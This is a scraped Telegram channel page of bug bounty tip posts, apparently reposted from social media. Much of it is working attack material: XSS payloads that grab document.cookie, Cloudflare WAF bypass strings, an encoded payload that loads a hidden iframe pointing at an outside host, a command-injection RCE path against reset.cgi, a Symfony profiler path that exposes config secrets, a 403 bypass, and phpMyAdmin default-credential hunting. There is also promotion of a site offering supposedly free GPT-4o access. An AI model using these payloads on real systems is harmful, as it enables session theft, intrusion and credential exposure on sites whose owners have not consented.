Termux All Command [Telegram Group]
Ir al canal en Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Mostrar más1 184
Suscriptores
+124 horas
+157 días
+4830 días
Archivo de publicaciones
My four XSS vulnerability reports were triaged.
I reported them to a single program on HackerOne.
Tips:
* if you were able to find a vulnerable parameter try to dork for it in a different assets, google dorks used:
site:*.target.com inurl:"?name="and site:*.target.com inurl:"?type="
* If you come across a sub-domain that says "You do not have permission to view this directory or page":
https://sub.target[.]com/ --> 403 (Forbidden)
https://sub.target[.]com/%3f/ --> 200 (OK)
Payload Used: </div><img src="x" onerror="alert(document.cookie)"/><div><p>Top technical skills for penetration tester specialists
● Nmap
● Kali Linux
● BackTrack
● SamuraiWTF
● Parrot
● Metasploit
● Kismet
● THC Hydra
● soapUI
● AppScan
● ZAP
● SOOS
● Canvas
● QualysGuard
● ArcSight
● Splunk
● Archer
● Nessus
● Nmap
● Nikto
● Wireshark
● WebInspect
● Netsparker
● Fortify
● Ounce Labs
● Acunetix
● SQLmap
● SAST
● DAST
● Social-Engineer Toolkit
● Objective-C
● Java
● C#
● C
● C++
● Python
● SQL
● ASP.NET
● PHP
● JavaScript
● Bash
● Ruby
● REST
● Powershell
● XML
● YAML
● JSON
● Protocols: FTP/POP3/IMAP/SMB/SSH
● TCP/IP
● Windows/iOS/Android/Linux/Unix
● Firewalls
● Networks
● Servers
● Cloud Infrastructures
● CI/CD
● Keyloggers
● Cryptography
● IDS/IPS
● Technical writing
● Hardware
● OSI layer model
connect for more post- https://linktr.ee/Harshleen_Chawla
CloudFlare XSS protection WAF Bypassed !
payload used:
<Img Src=OnXSS OnError=confirm(document.cookie)>
#bugbounty #infosec
🐞 Bug Bounty Tip: 🕵️♂️
If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data. Enjoy! 🚀
#bugbountytips #bugbountytip #cybersecurity #ethicalhacking
🎤 Practical Ethical Hacking From Beginner To Advance Course ⚡️
━━━━━━━━━━━━━━━━━━━━━━━━━
💯 A Complete FREE Course
☁️ DOWNLOAD LINK : https://drive.google.com/drive/mobile/folders/1if6MCeBCj8sxWwJIKhtgwU0GBuBW8uLx
━━━━━━━━━━━━━━━━━━━━━━━━━
➡️ 𝐆𝐢𝐯𝐞 𝐑𝐞𝐚𝐜𝐭𝐢𝐨𝐧𝐬 𝐎𝐧 𝐄𝐯𝐞𝐫𝐲 𝐏𝐨𝐬𝐭 🟩
━━━━━━━━━━━━━━━━━━━━━━━━━
🎁 Share Us For More -
Online tools for automating work with dorks (Google and beyond):
🔅dorki.io
🔅https://lnkd.in/ghpygKqw
🔅dorksearch.com
🔅dorkme.com
🔅dorkgenius.com
🔅dorks.faisalahmed.me
hashtag#bugbounty hashtag#bugbountytips
Access OpenAI ChatGPT4o for free!
Thanks me later 😉
Just translate the language from hashtag#Korean to hashtag#English
Here's the website link :- https://wrtn.ai/
Join the community of warrior’s :- https://lnkd.in/eurggv4a
Hii Bug hunters
I submitted 3x XSS
One in Referer
Tips :
1) Subfinder -d target.com -all -o subdomains.txt
2) cat subdomains.txt | httprobe | tee -a host.txt
3) cat host.txt | hakrawler | tee -a endpoint.txt
cat host.txt | waybackurls | tee -a endpoint.txt
4) cat endpoint.txt | qsreplace %27"></a></script></title></form></span></meta></style></iframe></noscript></textarea></xmp></pre><ScRiPt>alert(/Hacked%20by%20ahmad/)</sCrIpT> | tee -a xss_fuzz.txt
5) cat xss_fuzz.txt | freq | tee -a possible_xss.txt
Make sure you have disabled account registration on your WordPress site's '/𝐰𝐩-𝐥𝐨𝐠𝐢𝐧.𝐩𝐡𝐩?𝐚𝐜𝐭𝐢𝐨𝐧=𝐫𝐞𝐠𝐢𝐬𝐭𝐞𝐫' 𝐩𝐚𝐠𝐞.
This vulnerability allows threat actors to register an account, potentially 𝐠𝐫𝐚𝐧𝐭𝐢𝐧𝐠 𝐭𝐡𝐞𝐦 𝐚𝐝𝐦𝐢𝐧𝐢𝐬𝐭𝐫𝐚𝐭𝐢𝐯𝐞 𝐩𝐫𝐢𝐯𝐢𝐥𝐞𝐠𝐞𝐬 and enabling them to 𝐮𝐩𝐥𝐨𝐚𝐝 𝐬𝐡𝐞𝐥𝐥𝐬.
I've tested this vulnerability ( reported by @x0xr2r ) , and it appears to be exploitable on some sites. However, a fix is available, so patching your site is crucial. A 𝐆𝐨𝐨𝐠𝐥𝐞 search suggests there are still many vulnerable sites.
🚨 XSS Hunting from WaybackURLS 🔍
Payload :
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : gudetama_bf
#bugbountytips #bugbounty
Story of very quick RCE 📝
• Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can to add this paths for ur wordlist
• cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
• cgi-bin/reset.cgi?db_prefix=%26id%26
fuzzing as well
• cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips ❤️
Two P3 after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. 😎💪
Payload: ⚙️
"%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e"
#bugbountytips #infosec
Bug: Cross Site Scripting
Organization: HP
Tip: ><script>alert(document.domain)</script> ✘
"})";alert(document.domain)// ✔️
"}); closes an existing JavaScript function or HTML attribute.
// used to comment out the rest of the code to prevent syntax errors
How i am hunting for phpmyadmin logins:-
nuclei -l live-subs.txt -t nuclei-templates/http/exposed-panels/phpmyadmin-panel.yaml
## Then :-
- Test for default creds : root & password,..etc
- Fuzzing
- Test SQLi
- Response Manipulation
encoded xss payload : %3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
